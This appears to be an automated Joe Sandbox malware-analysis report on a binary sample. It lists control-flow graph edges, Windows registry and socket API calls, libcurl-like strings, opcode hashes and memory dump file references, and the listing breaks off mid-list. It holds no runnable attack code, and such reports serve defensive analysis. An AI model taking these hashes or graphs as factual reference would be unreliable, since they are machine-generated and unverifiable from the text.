987->994 991 a49fa0-a49fb6 call a3ebf0 * 2 989->991 992 a49f9b-a49f9e 989->992 1004 a49fb7-a49fbe 991->1004 992->963 992->991 1000 a49f8a-a49f92 994->1000 1001 a49b5a-a49b6e call a3e730 994->1001 1000->989 1007 a49b70-a4a004 1001->1007 1008 a49b8c-a49b97 call a463f0 1001->1008 1004->963 1013 a4a015-a4a01d 1007->1013 1016 a49b9d-a49bbf call a46740 call a463f0 1008->1016 1017 a49c9a-a49cab call a3ea00 1008->1017 1014 a4a024-a4a045 call a3ebf0 * 2 1013->1014 1015 a4a01f-a4a022 1013->1015 1014->965 1015->965 1015->1014 1016->1017 1035 a49bc5-a49bda call a46d60 1016->1035 1024 a49f31-a49f35 1017->1024 1025 a49cb1-a49ccd call a3ea00 call a3e960 1017->1025 1029 a49f37-a49f3a 1024->1029 1030 a49f40-a49f61 call a3ebf0 * 2 1024->1030 1043 a49cfd-a49d0e call a3e960 1025->1043 1044 a49ccf 1025->1044 1029->950 1029->1030 1030->950 1035->1017 1046 a49be0-a49bf4 call a46200 call a467e0 1035->1046 1054 a49d10 1043->1054 1055 a49d53-a49d55 1043->1055 1048 a49cd1-a49cec call a3e9f0 call a3e4a0 1044->1048 1046->1017 1063 a49bfa-a49c0b call a46320 1046->1063 1068 a49d47-a49d51 1048->1068 1069 a49cee-a49cfb call a3e9d0 1048->1069 1058 a49d12-a49d2d call a3e9f0 call a3e4a0 1054->1058 1061 a49e69-a49e8e call a3ea40 call a3e440 1055->1061 1086 a49d2f-a49d3c call a3e9d0 1058->1086 1087 a49d5a-a49d6f call a3e960 1058->1087 1082 a49e94-a49eaa call a3e3c0 1061->1082 1083 a49e90-a49e92 1061->1083 1079 a49b75-a49b86 call a3ea00 1063->1079 1080 a49c11-a49c1c call a47b70 1063->1080 1073 a49dca-a49ddb call a3e960 1068->1073 1069->1043 1069->1048 1091 a49ddd-a49ddf 1073->1091 1092 a49e2e-a49e36 1073->1092 1079->1008 1101 a49f2d 1079->1101 1080->1008 1104 a49c22-a49c33 call a3e960 1080->1104 1110 a49eb0-a49eb1 1082->1110 1111 a4a04a-a4a04c 1082->1111 1089 a49eb3-a49ec4 call a3e9c0 1083->1089 1086->1058 1113 a49d3e-a49d42 1086->1113 1106 a49d71-a49d73 1087->1106 1107 a49dc2 1087->1107 1089->950 1118 a49eca-a49ed0 1089->1118 1100 a49e06-a49e21 call a3e9f0 call a3e4a0 1091->1100 1097 a49e3d-a49e5b call a3ebf0 * 2 1092->1097 1098 a49e38-a49e3b 1092->1098 1108 a49e5e-a49e67 1097->1108 1098->1097 1098->1108 1141 a49de1-a49dee call a3ec80 1100->1141 1142 a49e23-a49e2c call a3eac0 1100->1142 1101->1024 1127 a49c35 1104->1127 1128 a49c66-a49c75 call a478a0 1104->1128 1116 a49d9a-a49db5 call a3e9f0 call a3e4a0 1106->1116 1107->1073 1108->1061 1108->1089 1110->1089 1121 a4a057-a4a070 call a3ebf0 * 2 1111->1121 1122 a4a04e-a4a051 1111->1122 1113->1061 1157 a49d75-a49d82 call a3ec80 1116->1157 1158 a49db7-a49dc0 call a3eac0 1116->1158 1125 a49ee5-a49ef2 call a3e9f0 1118->1125 1121->1004 1122->963 1122->1121 1125->950 1144 a49ef8-a49f0e call a3e440 1125->1144 1136 a49c37-a49c51 call a3e9f0 1127->1136 1149 a4a011 1128->1149 1150 a49c7b-a49c8f call a3e7c0 1128->1150 1136->1008 1167 a49c57-a49c64 call a3e9d0 1136->1167 1160 a49df1-a49e04 call a3e960 1141->1160 1142->1160 1165 a49f10-a49f26 call a3e3c0 1144->1165 1166 a49ed2-a49edf call a3e9e0 1144->1166 1149->1013 1150->1008 1170 a49c95-a4a00e 1150->1170 1174 a49d85-a49d98 call a3e960 1157->1174 1158->1174 1160->1092 1160->1100 1165->1166 1183 a49f28 1165->1183 1166->950 1166->1125 1167->1128 1167->1136 1170->1149 1174->1107 1174->1116 1183->963
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00A49946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00A49974
                                                          • RegCloseKey.KERNELBASE(?), ref: 00A4998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$`L$sts
                                                          • API String ID: 3677997916-272680077
                                                          • Opcode ID: 227ae61c3e32f63655cf1f35dcf3dc8a3e733f472c86bcc1baf152e25d1860d5
                                                          • Instruction ID: f306eefa72a2afea4c733b02255d73d477f50fa31749b4238cc50f31a360f1d3
                                                          • Opcode Fuzzy Hash: 227ae61c3e32f63655cf1f35dcf3dc8a3e733f472c86bcc1baf152e25d1860d5
                                                          • Instruction Fuzzy Hash: 5B3295B9904201ABEB11AB24ED42B1B76E8AF94354F084438F949D7263F732ED25D793
                                                          Function 009B8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1358 9b8b50-9b8b69 1359 9b8b6b-9b8b74 1358->1359 1360 9b8be6 1358->1360 1361 9b8beb-9b8bf2 1359->1361 1362 9b8b76-9b8b8d 1359->1362 1363 9b8be9 1360->1363 1364 9b8b8f-9b8ba7 call 996e40 1362->1364 1365 9b8bf3-9b8bfe call 9ba550 1362->1365 1363->1361 1372 9b8cd9-9b8d16 SleepEx 1364->1372 1373 9b8bad-9b8baf 1364->1373 1370 9b8de4-9b8def 1365->1370 1371 9b8c04-9b8c08 1365->1371 1376 9b8e8c-9b8e95 1370->1376 1377 9b8df5-9b8e19 call 9ba150 1370->1377 1374 9b8c0e-9b8c1d 1371->1374 1375 9b8dbd-9b8dc3 1371->1375 1394 9b8d18-9b8d20 1372->1394 1395 9b8d22 1372->1395 1378 9b8ca6-9b8cb0 1373->1378 1379 9b8bb5-9b8bb9 1373->1379 1382 9b8c1f-9b8c30 connect 1374->1382 1383 9b8c35-9b8c48 call 9ba150 1374->1383 1375->1363 1380 9b8f00-9b8f06 1376->1380 1381 9b8e97-9b8e9c 1376->1381 1416 9b8e1b-9b8e26 1377->1416 1417 9b8e88 1377->1417 1378->1372 1384 9b8cb2-9b8cb8 1378->1384 1379->1361 1386 9b8bbb-9b8bc2 1379->1386 1380->1361 1388 9b8edf-9b8eef call 9878b0 1381->1388 1389 9b8e9e-9b8eb6 call 992a00 1381->1389 1382->1383 1415 9b8c4d-9b8c4f 1383->1415 1390 9b8cbe-9b8cd4 call 9bb180 1384->1390 1391 9b8ddc-9b8dde 1384->1391 1386->1361 1393 9b8bc4-9b8bcc 1386->1393 1412 9b8ef2-9b8efc 1388->1412 1389->1388 1414 9b8eb8-9b8edd call 993410 * 2 1389->1414 1390->1370 1391->1363 1391->1370 1401 9b8bce-9b8bd2 1393->1401 1402 9b8bd4-9b8bda 1393->1402 1397 9b8d26-9b8d39 1394->1397 1395->1397 1404 9b8d3b-9b8d3d 1397->1404 1405 9b8d43-9b8d61 call 99d8c0 call 9ba150 1397->1405 1401->1361 1401->1402 1402->1361 1410 9b8bdc-9b8be1 1402->1410 1404->1391 1404->1405 1434 9b8d66-9b8d74 1405->1434 1418 9b8dac-9b8db8 call 9c50a0 1410->1418 1412->1380 1414->1412 1421 9b8c8e-9b8c93 1415->1421 1422 9b8c51-9b8c58 1415->1422 1423 9b8e28-9b8e2c 1416->1423 1424 9b8e2e-9b8e85 call 99d090 call 9c4fd0 1416->1424 1417->1376 1418->1361 1426 9b8c99-9b8c9f 1421->1426 1427 9b8dc8-9b8dd9 call 9bb100 1421->1427 1422->1421 1430 9b8c5a-9b8c62 1422->1430 1423->1417 1423->1424 1424->1417 1426->1378 1427->1391 1435 9b8c6a-9b8c70 1430->1435 1436 9b8c64-9b8c68 1430->1436 1434->1361 1440 9b8d7a-9b8d81 1434->1440 1435->1421 1442 9b8c72-9b8c8b call 9c50a0 1435->1442 1436->1421 1436->1435 1440->1361 1445 9b8d87-9b8d8f 1440->1445 1442->1421 1448 9b8d9b-9b8da1 1445->1448 1449 9b8d91-9b8d95 1445->1449 1448->1361 1451 9b8da7 1448->1451 1449->1361 1449->1448 1451->1418
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 009B8C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 009B8CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnect
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 238548546-879669977
                                                          • Opcode ID: c09b881d9c516100c606896e8744ea7372586c60481395e82aa4a2bb7e859707
                                                          • Instruction ID: 320ce4063dba3d08409e3b34310b92ab0ca84285d7fb5a01367d4e9785b90c13
                                                          • Opcode Fuzzy Hash: c09b881d9c516100c606896e8744ea7372586c60481395e82aa4a2bb7e859707
                                                          • Instruction Fuzzy Hash: DBB1A270604306AFDB10DF34CA85BA7BBA8AF99324F04892DE8594B2D2DB71EC55C761
                                                          Function 00982F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1452 982f17-982f8c call e098f0 call e09ce0 1457 9831c9-9831cd 1452->1457 1458 982f91-982ff4 call 981619 RegOpenKeyExA 1457->1458 1459 9831d3-9831d6 1457->1459 1462 982ffa-98300b 1458->1462 1463 9831c5 1458->1463 1464 98315c-9831ac RegEnumKeyExA 1462->1464 1463->1457 1465 983010-983083 call 981619 RegOpenKeyExA 1464->1465 1466 9831b2-9831c2 1464->1466 1470 983089-9830d4 RegQueryValueExA 1465->1470 1471 98314e-983152 1465->1471 1466->1463 1472 98313b-98314b RegCloseKey 1470->1472 1473 9830d6-983137 call e09bc0 call e09c50 call e09ce0 call e09af0 call e09ce0 call e08050 1470->1473 1471->1464 1472->1471 1473->1472
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436
                                                          • Opcode ID: a2fb83c87c5e224d05c7edd1f734fdae777d172ccc524babfda37b71d9b9cd12
                                                          • Instruction ID: 3976d7fd03e85564fb3897d3fe0ecfc0f555154969d63339162928426b9d5756
                                                          • Opcode Fuzzy Hash: a2fb83c87c5e224d05c7edd1f734fdae777d172ccc524babfda37b71d9b9cd12
                                                          • Instruction Fuzzy Hash: 4571A5B49043199FDB10EF69C58579EBBF0BF84304F10886DE998A7341D7749A88CF92
                                                          Function 00A4AA30 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1486 a4aa30-a4aa64 1488 a4ab04-a4ab09 1486->1488 1489 a4aa6a-a4aaa7 call a3e730 1486->1489 1490 a4ae80-a4ae89 1488->1490 1493 a4ab0e-a4ab13 1489->1493 1494 a4aaa9-a4aabd 1489->1494 1495 a4ae2e 1493->1495 1496 a4aabf-a4aac7 1494->1496 1497 a4ab18-a4ab50 1494->1497 1498 a4ae30-a4ae4a call a3ea60 call a3ebf0 1495->1498 1496->1495 1499 a4aacd-a4ab02 1496->1499 1502 a4ab58-a4ab6d 1497->1502 1511 a4ae75-a4ae7d 1498->1511 1512 a4ae4c-a4ae57 1498->1512 1499->1502 1505 a4ab96-a4abab socket 1502->1505 1506 a4ab6f-a4ab73 1502->1506 1505->1495 1510 a4abb1-a4abc5 1505->1510 1506->1505 1508 a4ab75-a4ab8f 1506->1508 1508->1510 1524 a4ab91 1508->1524 1513 a4abc7-a4abca 1510->1513 1514 a4abd0-a4abed ioctlsocket 1510->1514 1511->1490 1516 a4ae6e-a4ae6f 1512->1516 1517 a4ae59-a4ae5e 1512->1517 1513->1514 1518 a4ad2e-a4ad39 1513->1518 1519 a4ac10-a4ac14 1514->1519 1520 a4abef-a4ac0a 1514->1520 1516->1511 1517->1516 1527 a4ae60-a4ae6c 1517->1527 1525 a4ad52-a4ad56 1518->1525 1526 a4ad3b-a4ad4c 1518->1526 1521 a4ac16-a4ac31 1519->1521 1522 a4ac37-a4ac41 1519->1522 1520->1519 1532 a4ae29 1520->1532 1521->1522 1521->1532 1529 a4ac43-a4ac46 1522->1529 1530 a4ac7a-a4ac7e 1522->1530 1524->1495 1531 a4ad5c-a4ad6b 1525->1531 1525->1532 1526->1525 1526->1532 1527->1511 1536 a4ad04-a4ad08 1529->1536 1537 a4ac4c-a4ac51 1529->1537 1538 a4ace7-a4ad03 1530->1538 1539 a4ac80-a4ac9b 1530->1539 1533 a4ad70-a4ad78 1531->1533 1532->1495 1541 a4ada0-a4adb2 connect 1533->1541 1542 a4ad7a-a4ad7f 1533->1542 1536->1518 1543 a4ad0a-a4ad28 1536->1543 1537->1536 1544 a4ac57-a4ac78 1537->1544 1538->1536 1539->1538 1545 a4ac9d-a4acc1 1539->1545 1548 a4adb3-a4adcf 1541->1548 1542->1541 1546 a4ad81-a4ad99 1542->1546 1543->1518 1543->1532 1549 a4acc6-a4acd7 1544->1549 1545->1549 1546->1548 1556 a4add5-a4add8 1548->1556 1557 a4ae8a-a4ae91 1548->1557 1549->1532 1555 a4acdd-a4ace5 1549->1555 1555->1536 1555->1538 1558 a4ade1-a4adf1 1556->1558 1559 a4adda-a4addf 1556->1559 1557->1498 1560 a4adf3-a4ae07 1558->1560 1561 a4ae0d-a4ae12 1558->1561 1559->1533 1559->1558 1560->1561 1567 a4aea8-a4aead 1560->1567 1562 a4ae14-a4ae17 1561->1562 1563 a4ae1a-a4ae1c call a4af70 1561->1563 1562->1563 1566 a4ae21-a4ae23 1563->1566 1568 a4ae25-a4ae27 1566->1568 1569 a4ae93-a4ae9d 1566->1569 1567->1498 1568->1498 1570 a4aeaf-a4aeb1 call a3e760 1569->1570 1571 a4ae9f-a4aea6 call a3e7c0 1569->1571 1575 a4aeb6-a4aebe 1570->1575 1571->1575 1576 a4aec0-a4aedb call a3e180 1575->1576 1577 a4af1a-a4af1f 1575->1577 1576->1498 1580 a4aee1-a4aeec 1576->1580 1577->1498 1581 a4af02-a4af06 1580->1581 1582 a4aeee-a4aeff 1580->1582 1583 a4af0e-a4af15 1581->1583 1584 a4af08-a4af0b 1581->1584 1582->1581 1583->1490 1584->1583
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00A4AB9B
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00A4ABE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID: XL$`L
                                                          • API String ID: 416004797-645526465
                                                          • Opcode ID: 1f1b2342480a6275818e2ab09b4b82b0c86ddc3ddc9fbf3e35934af95f3a362f
                                                          • Instruction ID: 258057a51163741feacf843cba5857746c3414f4b82833558a4128f8277bcb96
                                                          • Opcode Fuzzy Hash: 1f1b2342480a6275818e2ab09b4b82b0c86ddc3ddc9fbf3e35934af95f3a362f
                                                          • Instruction Fuzzy Hash: 0FE1E1796443029BEB20CF24C885B6BB7E5EFD9300F044A2DF9A98B291D775DD44CB92
                                                          Function 009B9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1677 9b9290-9b92ed call 9876a0 1680 9b93c3-9b93ce 1677->1680 1681 9b92f3-9b92fb 1677->1681 1690 9b93d0-9b93e1 1680->1690 1691 9b93e5-9b9427 call 99d090 call 9c4f40 1680->1691 1682 9b93aa-9b93af 1681->1682 1683 9b9301-9b9333 call 99d8c0 call 99d9a0 1681->1683 1684 9b9456-9b9470 1682->1684 1685 9b93b5-9b93bc 1682->1685 1701 9b93a7 1683->1701 1702 9b9335-9b9364 WSAIoctl 1683->1702 1688 9b9429-9b9431 1685->1688 1689 9b93be 1685->1689 1693 9b9439-9b943f 1688->1693 1694 9b9433-9b9437 1688->1694 1689->1684 1690->1685 1695 9b93e3 1690->1695 1691->1684 1691->1688 1693->1684 1699 9b9441-9b9453 call 9c50a0 1693->1699 1694->1684 1694->1693 1695->1684 1699->1684 1701->1682 1705 9b939b-9b93a4 1702->1705 1706 9b9366-9b936f 1702->1706 1705->1701 1706->1705 1709 9b9371-9b9390 setsockopt 1706->1709 1709->1705 1710 9b9392-9b9395 1709->1710 1710->1705
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 009B935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 009B9388
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: d8c9907b278fb285feb558fc9b9a7b2389d29e3d28e06c095871342545e43351
                                                          • Instruction ID: 066a19df00fd6f4e92d746f139f067a5d6fa8218bcbf79509d2e66b3cc9b48da
                                                          • Opcode Fuzzy Hash: d8c9907b278fb285feb558fc9b9a7b2389d29e3d28e06c095871342545e43351
                                                          • Instruction Fuzzy Hash: 0C51E370A04305ABD710DF24C981FAAB7A9FF84324F148529FE489B2D2E731E951CB91
                                                          Function 009876A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1711 9876a0-9876be 1712 9876c0-9876c7 1711->1712 1713 9876e6-9876f2 send 1711->1713 1712->1713 1714 9876c9-9876d1 1712->1714 1715 98775e-987762 1713->1715 1716 9876f4-987709 call 9872a0 1713->1716 1717 98770b-987759 call 9872a0 call 98cb20 call d08c50 1714->1717 1718 9876d3-9876e4 1714->1718 1716->1715 1717->1715 1718->1716
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,00983D4E,00000000,?,?,009907BF), ref: 009876EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
